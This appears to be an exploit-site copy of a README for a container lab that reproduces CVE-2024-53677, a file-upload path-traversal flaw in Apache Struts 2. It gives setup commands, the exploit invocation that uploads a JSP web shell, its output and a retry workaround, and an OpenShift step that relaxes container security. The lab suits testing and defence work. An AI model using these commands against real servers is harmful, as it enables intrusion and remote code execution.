Exploit for CVE-2024-53677

Name: Exploit for CVE-2024-53677
Rating: 5 (67 reviews)
2025-01-10 | CVSS 9.5
## https://sploitus.com/exploit?id=F2757BC6-4EE5-5397-BBFA-E5FBA509FB27
CVE-2024-53677 - Apache Struts 2 Remote Code Execution Vulnerability (RCE) Reproduction Environment

This repository provides a container-based environment to reproduce the CVE-2024-53677 vulnerability in Apache Struts 2. This vulnerability involves path traversal and allows for arbitrary code execution (RCE) through the file upload functionality in Struts 2.

## Setup Instructions

The environment can be built and run using Podman. Follow these steps to set up the application:

```sh[
git clone https://github.com/seanrickerd/CVE-2024-53677.git
cd CVE-2024-53677 
podman build --ulimit nofile=122880:122880 -m 3G -t cve-2024-53677 .
podman run -d -p 8080:8080 --ulimit nofile=122880:122880 -m 3G --rm -it --name cve-2024-53677 cve-2024-53677
```
Running the exploit: 

```sh
pip install -r requirements.txt
python S2-067.py -u http://localhost:8080 --upload_endpoint /upload.action --files newshell.jsp --destination ../newshell.jsp
```
There is an intermittent issue where the file will upload properly but will not be accessible. To work around this, you will need to add an extra . to the destination, then re-run the original command. 

```sh
$ python S2-067.py -u http://localhost:8080 --upload_endpoint /upload.action --files shell.jsp --destination ../shell.jsp
[INFO] Uploading files to http://localhost:8080/upload.action...
[SUCCESS] File newshell.jsp uploaded successfully: ../shell.jsp
[INFO] Verifying uploaded file: http://localhost:8080/shell.jsp
[INFO] File not accessible. HTTP Status: 404
$ python S2-067.py -u http://localhost:8080 --upload_endpoint /upload.action --files shell.jsp --destination .../shell.jsp
[INFO] Uploading files to http://localhost:8080/upload.action...
[SUCCESS] File newshell.jsp uploaded successfully: .../shell.jsp
[INFO] Verifying uploaded file: http://localhost:8080/.../shell.jsp
[INFO] File not accessible. HTTP Status: 404
$ python S2-067.py -u http://localhost:8080 --upload_endpoint /upload.action --files shell.jsp --destination ../shell.jsp
[INFO] Uploading files to http://localhost:8080/upload.action...
[SUCCESS] File newshell.jsp uploaded successfully: ../shell.jsp
[INFO] Verifying uploaded file: http://localhost:8080/shell.jsp
[ALERT] File uploaded and accessible: http://localhost:8080/shell.jsp
```
The shell will be accessible via a browser at http://localhost:8080/shell.jsp


## Running in OpenShift

OpenShift is secure by default, so you'll need to allow privileged containers first: 

```sh
oc adm policy add-scc-to-group anyuid system:authenticated
```
If you wish to build the image file yourself, you will also need to add the following lines to the dockerfile: 

```
COPY --from=0 /usr/src/cve/target/upload-1.0.0.war /usr/local/tomcat/webapps/ROOT.war
COPY ./tomcat-users.xml /usr/local/tomcat/conf/tomcat-users.xml
COPY ./context.xml /usr/local/tomcat/webapps/manager/META-INF/context.xml
```

The following yaml will create a namespace called "vulnerables" and deploy the vulnerable container as a deployment with a replica of 1, a service and a route allowing you to access the vulnerable workload.

If you've built the image yourself, you will need to change the location of the image in the yaml to reflect the location of your image. 

```sh
oc create -f ocp-struts.yaml 
```

You can find the route in Networking->Routes. 

![OpenShift Route](route.gif)